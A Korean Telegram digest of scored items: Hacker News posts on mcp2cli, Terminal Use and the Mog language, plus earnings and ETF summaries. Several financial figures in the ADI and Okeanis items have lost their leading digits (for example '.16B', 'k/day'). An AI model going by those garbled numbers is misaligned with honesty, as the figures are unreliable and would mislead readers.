260310 Telegram 모음
[8/10] Show HN: Mcp2cli – One CLI for every API, 96-99% fewer tokens than native MCP (1
Show HN: Mcp2cli – One CLI for every API, 96-99% fewer tokens than native MCP (141 pts) Every MCP server injects its full tool schemas into context on every turn — 30 tools costs ~3,600 tokens/turn whether the model uses them or not. Over 25 turns with 120 tools, that's 362,000 tokens just for schemas.
mcp2cli turns any MCP server or OpenAPI spec into a CLI at runtime. The LLM discovers tools on demand:
mcp2cli --mcp https://mcp.example.com/sse --list # ~16 tokens/tool
mcp2cli --mcp https://mcp.example.com/sse create-task --help # ~120 tokens, once
mcp2cli --mcp https://mcp.example.com/sse create-task --title "Fix bug"
No codegen, no rebuild when the server changes. Works with any LLM — it's just a CLI the model shells out to. Also handles OpenAPI specs (JSON/YAML, local or remote) with the same interface.Token savings are real, measured with cl100k_base: 96% for 30 tools over 15 turns, 99% for 120 tools over 25 turns.
It also ships as an installable skill for AI coding agents (Claude Code, Cursor, Codex): npx skills add knowsuchagency/mcp2cli --skill mcp2cli
Inspired by Kagan Yilmaz's CLI vs MCP analysis and CLIHub.
https://github.com/knowsuchagency/mcp2cli agent_orchestration llm agent claude code mcp server
점수: 8/10 — 점수 8/10: mcp, claude code, claude
[7/10] Launch HN: Terminal Use (YC W26) – Vercel for filesystem-based agents (93 pts) H
Launch HN: Terminal Use (YC W26) – Vercel for filesystem-based agents (93 pts) Hello Hacker News! We're Filip, Stavros, and Vivek from Terminal Use (https://www.terminaluse.com/). We built Terminal Use to make it easier to deploy agents that work in a sandboxed environment and need filesystems to do work. This includes coding agents, research agents, document processing agents, and internal tools that read and write files.
Here's a demo: https://www.youtube.com/watch?v=ttMl96l9xPA.
Our biggest pain point with hosting agents was that you'd need to stitch together multiple pieces: packaging your agent, running it in a sandbox, streaming messages back to users, persisting state across turns, and managing getting files to and from the agent workspace.
We wanted something like Cog from Replicate, but for agents: a simple way to package agent code from a repo and serve it behind a clean API/SDK. We wanted to provide a protocol to communicate with your agent, but not constraint the agent logic or harness itself.
On Terminal Use, you package your agent from a repo with a config.yaml and Dockerfile, then deploy it with our CLI. You define the logic of three endpoints (on_create, on_event, and on_cancel) which track the lifecycle of a task (conversation). The config.yaml contains details about resources, build context, etc.
Out of the box, we support Claude Agent SDK and Codex SDK agents. By support, we mean that we have an adapter that converts from the SDK message types to ours. If you'd like to use your own custom harness, you can convert and send messages with our types (Vercel AI SDK v6 compatible). For the frontend, we have a Vercel AI SDK provider that lets you use your agent with Vercel's AI SDK, and have a messages module so that you don't have to manage streaming and persistence yourself.
The part we think is most different is storage.
We treat filesystems as first-class primitives, separate from the lifecycle of a task. That means you can persist a workspace across turns, share it between different agents, or upload / download files independent of the sandbox being active. Further, our filesystem SDK provides presigned urls which makes it easy for your users to directly upload and download files which means that you don't need to proxy file transfer through your backend.
Since your agent logic and filesystem storage are decoupled, this makes it easy to iterate on your agents without worrying about the files in the sandbox: if you ship a bug, you can deploy and auto-migrate all your tasks to the new deployment. If you make a breaking change, you can specify that existing tasks stay on the existing version, and only new tasks use the new version.
We're also adding support for multi-filesystem mounts with configurable mount paths and read/write modes, so storage stays durable and reusable while mount layout stays task-specific.
On the deployment side, we've been influenced by modern developer platforms: simple CLI deployments, preview/production environments, git-based environment targeting, logs, and rollback. All the configuration you need to build, deploy & manage resources for your agent is stored in the config.yaml file which makes it easy to build & deploy your agent in CI/CD pipelines.
Finally, we've explicitly designed our platform for your CLI coding agents to help you build, test, & iterate with your agents. With our CLI, your coding agents can send messages to your deployed agents, and download filesystem contents to help you understand your agent's output. A common way we test our agents is that we make markdown files with user scenarios we'd like to test, and then ask Claude Code to impersonate our users and chat with our deployed agent.
What we do not have yet: full parity with general-purpose sandbox providers. For example, preview URLs and lower-level sandbox.exec(...) style APIs are still on the roadmap.
We're excited to hear any thoughts, insights, questions, and concerns in the comments below! agent_orchestration ron agent claude code
점수: 7/10 — 점수 7/10: claude code, claude
[6/10] Show HN: The Mog Programming Language (126 pts) Hi, Ted here, creator of Mog.
Show HN: The Mog Programming Language (126 pts) Hi, Ted here, creator of Mog.
- Mog is a statically typed, compiled, embedded language (think statically typed Lua) designed to be written by LLMs -- the full spec fits in 3,200 tokens. - An AI agent writes a Mog program, compiles it, and dynamically loads it as a plugin, script, or hook. - The host controls exactly which functions a Mog program can call (capability-based permissions), so permissions propagate from agent to agent-written code. - Compiled to native code for low-latency plugin execution -- no interpreter overhead, no JIT, no process startup cost. - The compiler is written in safe Rust so the entire toolchain can be audited for security. Even without a full security audit, Mog is already useful for agents extending themselves with their own code. - MIT licensed, contributions welcome.
Motivations for Mog:
1. Syntax Only an AI Could Love: Mog is written for AIs to write, so the spec fits easily in context (~3200 tokens), and it's intended to minimize foot-guns to lower the error rate when generating Mog code. This is why Mog has no operator precedence: non-associative operations have to use parentheses, e.g. (a + b) * c. It's also why there's no implicit type coercion, which I've found over the decades to be an annoying source of runtime bugs. There's also less support in Mog for generics, and there's absolutely no support for metaprogramming, macros, or syntactic abstraction.
When asking people to write code in a language, these restrictions could be onerous. But LLMs don't care, and the less expressivity you trust them with, the better.
2. Capabilities-Based Permissionsl: There's a paradox with existing security models for AI agents. If you give an agent like OpenClaw unfettered access to your data, that's insecure and you'll get pwned. But if you sandbox it, it can't do most of what you want. Worse, if you run scripts the agent wrote, those scripts don't inherit the permissions that constrain the agent's own bash tool calls, which leads to pwnage and other chaos. And that's not even assuming you run one of the many OpenClaw plugins with malware.
Mog tries to solve this by taking inspiration from embedded languages. It compiles all the way to machine code, ahead of time, but the compiler doesn't output any dangerous code (at least it shouldn't -- Mog is quite new, so that could still be buggy). This allows a host program, such as an AI agent, to generate Mog source code, compile it, and load it into itself using dlopen(), while maintaining security guarantees.
The main trick is that a Mog program on its own can't do much. It has no direct access to syscalls, libc, or memory. It can basically call functions, do heap allocations (but only within the arena the host gives it), and return something. If the host wants the Mog program to be able to do I/O, it has to supply the functions that the Mog program will call. A core invariant is that a Mog program should never be able to crash the host program, corrupt its state, or consume more resources than the host allows.
This allows the host to inspect the arguments to any potentially dangerous operation that the Mog program attempts, since it's code that runs in the host. For example, a host agent could give a Mog program a function to run a bash command, then enforce its own session-level permissions on that command, even though the command was dynamically generated by a plugin that was written without prior knowledge of those permission settings.
(There are a couple other tricks that PL people might find interesting. One is that the host can limit the execution time of the guest program. It does this using cooperative interrupt polling, i.e. the compiler inserts runtime checks that check if the host has asked the guest to stop. This causes a roughly 10% drop in performance on extremely tight loops, which are the worst case. It could almost certainly be optimized.)
3. Self Modification Without Restart: When I try to modify my OpenClaw from my phone, I have to restart the whole agent. Mog fixes this: an agent can compile and run new plugins without interrupting a session, which makes it dynamically responsive to user feedback (e.g., you tell it to always ask you before deleting a file and without any interruption it compiles and loads the code to... actually do that).
Async support is built into the language, by adapting LLVM's coroutine lowering to our Rust port of the QBE compiler, which is what Mog uses for compilation. The Mog host library can be slotted into an async event loop (tested with Bun), so Mog async calls get scheduled seamlessly by the agent's event loop. Another trick is that the Mog program uses a stack inside the memory arena that the host provides for it to run in, rather than the system stack. The system tracks a guard page between the stack and heap. This design prevents stack overflow without runtime overhead.
Lots of work still needs to be done to make Mog a "batteries-included" experience like Python. Most of that work involves fleshing out a standard library to include things like JSON, CSV, Sqlite, and HTTP. One high-impact addition would be an llm library that allows the guest to make LLM calls through the agent, which should support multiple models and token budgeting, so the host could prevent the plugin from burning too many tokens.
I suspect we'll also want to do more work to make the program lifecycle operations more ergonomic. And finally, there should be a more fully featured library for integrating a Mog host into an AI agent like OpenClaw or OpenAI's Codex CLI. agent_orchestration llm agent openclaw
점수: 6/10 — 점수 6/10: openclaw
[8/10] 1. KoAct 코스닥액티브와 TIME 코스닥액티브 신규 상장(2026-03-10). 두 ETF는 코스닥 지수를 비교지수로 하는 액티브 운용으로
- KoAct 코스닥액티브와 TIME 코스닥액티브 신규 상장(2026-03-10). 두 ETF는 코스닥 지수를 비교지수로 하는 액티브 운용으로 코스닥 대비 초과수익을 추구하며, 정부의 코스닥 활성화 정책으로 수급 모멘텀 기대. 2. KoAct는 반도체·로봇·우주항공·바이오·2차전지 등 성장섹터에 모멘텀 기반으로 폭넓게 투자(총보수 0.50%, 상장일 포트폴리오 57종목). 3. TIME은 재무건전성·수익성으로 핵심-위성 포트 구성, 2차전지·바이오 집중(총보수 0.70%, 상장일 포트폴리오 50종목).
점수: 8/10 — 점수 8/10: etf, 섹터, 포트폴리오
[8/10] 스마트글래스 대장주 에실로룩소티카 실적 리뷰 [EL.FR] FY25 Results = 매출 €28.49B (est. €28.06B), YoY 7
스마트글래스 대장주 에실로룩소티카 실적 리뷰 [EL.FR] FY25 Results = 매출 €28.49B (est. €28.06B), YoY 7% = GPM 60.6% (est. 62.3%), YoY -2.9%p = OPM 15.6% (est. 15.9%), YoY -1.0%p = EPS €6.79 (est. €6.85) *P/E = 34.8x = OCF €5.29B (est. €5.28B) = CAPEX €1.53B (est. €1.58B) = AI 글래스 연 700만대 이상 판매 Guidance 향후 5년 동안 매출과 영업이익이 나란히 성장(Broadly Aligned Growth)할 것으로 예상한다. 이는 초기 투자 단계에서 규모의 경제를 갖춘 수익 가속화 단계로 진입함을 의미한다. 2026년에는 1월 매출이 두 자릿수 성장을 기록하며 강력한 성과로 한해를 시작했다. 다만, 미국 관세 영향의 연간화와 현재의 강유로(약달러) 환율 기조는 실적에 일부 하방 압력으로 작용할 것으로 예상한다. 2026년 하반기 성능이 크게 개선된 2세대 청력 보조 안경(Nuance Audio)과 차세대 AR 글래스 라인업 확대를 통해 신규 매출원을 창출할 계획이다. Review 지난주 2/11에 나온 실적 결과입니다. 실적을 한 마디로 요약하면, AI 글래스 매출이 빠르게 믹스를 확장하고 있지만 마진 자체는 기대 이하인 모습입니다. 마진을 개선하기 위해서는 일단 판매량이 늘어야 합니다. 에실로는 현재 AI 글래스를 연 1000만대를 생산 중이며, 지난 달에 케파를 2~3배 확장한다는 블룸버그 보도가 있었습니다. 이에 대해 회사는 중국의 현대화된 공장과 태국의 대규모 생산 기지에 즉시 증설할 수 있는 준비가 돼 있다고 응답했습니다. 즉, 수요에 맞춰 케파를 늘리겠다는 기조를 유지한 것입니다. 에실로는 직접 운영하는 DTC 매장이 18,000개나 됩니다. 경영진은 고객들이 AI 글래스를 구매하기 위해 자사 매장에 들리며, 설령 AI 글래스 재고가 없더라도 일반 안경·선글라스 구매로 전환하는 비율이 높다고 합니다. 확실한 판매 채널과 생산 부지까지 갖춘 회사 입장에서는 수요만 따라와주면 됩니다. 에실로에 따르면 AI 글래스 유통망이 경쟁사보다 2년 앞서 있다고 합니다. 참고로 AI 글래스가 제품 관점에서 수익성이 상당히 큰 이유가 단가가 높은 것도 있지만 부가적인 부품 구매가 따라오기 때문인데요. AI 글래스는 도수렌즈와 변색렌즈를 부착할 수 있는데 구매자의 도수렌즈 채택 비율이 20%, 변색렌즈의 경우 40~50% 수준이라고 합니다. 일종의 업셀링 효과라고 보면 되며, AI 글래스의 사용자당 수익이 매우 높은 제품이라는 것을 증명하고 있습니다. AI 글래스 말고 근시교정렌즈인 '스텔리스트'도 또다른 성장축입니다. 스텔리스트의 지난해 매출이 YoY 22% 성장했을 정도입니다. 중국에서 더 빠르게 자리잡은 제품인데요. 중국 어린이의 20%가 스텔리스트를 착용하도록 하는 게 목표라고 합니다. 미국에서도 2025년 9월 FDA 승인 이후 4,000개 이상 매장에 입점한 상태입니다. https://t.me/d_ticker
출처: https://t.me/d_ticker
점수: 8/10 — 점수 8/10: 실적, 성능
[7/10] [클라우드 기반 24/7 AI 비서 SkyBot] [이미 업무용 AI에이전트라는 이름으로 프로젝트를 만들어왔던 Skywork]의 최근 소식 공유
[클라우드 기반 24/7 AI 비서 SkyBot] [이미 업무용 AI에이전트라는 이름으로 프로젝트를 만들어왔던 Skywork]의 최근 소식 공유드립니다😉 OpenClaw의 등장으로 에이전트라는 장벽이 조금은 낮아진것 같은데 Skybot도 한번 살펴보면 좋을것 같네요👍 ✅ SkyBot 간략정리 - 화면을 보고 마우스와 키보드를 조작할 수 있는 시각 기반 에이전트(Vision-Based Agent) - 텔레그램과 왓츠앱을 통해 사용자가 직접 명령을 내리고 작업을 자동화 할 수 있음 - 자율 제어 기능으로 결제 직전 단계까지는 스스로 진행이 가능 - 브라우징 에이전트(Web Agent)와 데스크톱 오퍼레이터(OS Agent) 등의 핵심 기능으로 웹/윈도우&맥 환경에서 사용자의 요구사항을 수행 - 사용자의 반복되는 업무들의 워크플로우를 자동화해서 루틴으로 만들어줌 - 민감한 정보 등이 입력되는 구간에서는 화면 캡처를 중단하거나 로컬에서만 데이터를 처리하며 강력한 보안 모드 구축 일단 OpenClaw랑 다른 것은 설치 방식 자체가 클라우드 기반이라 설치하지 않아도 바로 사용이 가능하며 보안에 대한 부분을 상당히 해소시켰다는 점이 돋보입니다🔥🔥 게다가 Low Latency를 강점으로 내세워 실제 사람이 조작하는 것 같은 매끄러운 속도를 보여준다고 해요💯 🤔 26년은 에이전트의 해라는 이야기가 참 많아요. 이런 에이전트형 모델들도 계속해서 등장할것 같은데 이 시장은 누가 장악하게 될지 보는 재미도 놓칠 수 없겠습니다⚡️ 👉 원문 보기: https://x.com/Skywork_ai/status/2020834079953064394
출처: https://x.com/Skywork_ai/status/2020834079953064394
점수: 7/10 — 점수 7/10: 자동화, openclaw
[7/10] 아날로그 디바이스 실적: ADI 1Q FY26 매출 .16B (est. .12B), OPM 45.5% (est. 43.6%), EPS .46 (
아날로그 디바이스 실적: ADI 1Q FY26 매출 .16B (est. .12B), OPM 45.5% (est. 43.6%), EPS .46 (est. .31). 2Q FY26 가이던스: 매출 .5B (est. .2B), OPM 47.5% (est. 44.6%), EPS .88 (est. .46). A&D 부문 역대 최대 분기 매출, ATE 성장 YoY 40%+, 포트폴리오 믹스: 자동차 25% 수준, A&D+ATE+데이터센터 약 60% 노출, 가격인상 효과로 매출 성장의 약 1/3 기여. https://t.me/d_ticker
출처: https://t.me/d_ticker
점수: 7/10 — 점수 7/10: 포트폴리오, 실적
[6/10] Okeanis Eco Tankers Corp.(ECO) 어닝콜 요약: 4Q25 Fleet TCE k/day, VLCC k, Suezmax k;
Okeanis Eco Tankers Corp.(ECO) 어닝콜 요약: 4Q25 Fleet TCE k/day, VLCC k, Suezmax k; Adjusted EBITDA M; Adj Net Profit M; Adj EPS .78; 연간 TCE 매출 .4M; 연간 EBITDA M; 연간 순이익 M; 현금 .5M; 총부채 M (+M 추가차입); 장부 레버리지 46%; Net LTV 35%. 1Q26 기준 VLCC 67% 고정 .2k/day, Suezmax 64% 고정 .6k/day, Fleet avg 약 .8k/day. 12개월 TC 사례 .14k/day. Synacor 통합 운영 VLCC 약 156척, 제재 선박 20% 이상 격리. 15분기 연속 배당, 분기 배당 .55; 최근 4분기 배당 합 .32. 자본조달: 2회 증자 M. 선박 매입가 실질 할인 적용. 향후 전략: 주주환원 우선, 장기계약 확대 없음(향후 재검토), Synacor 선박 매각 고려 없음, 스팟 익스포저 유지, 시장 상승 초기 단계 판단, 구조적 선복 부족 가능성.
점수: 6/10 — 점수 6/10: 배당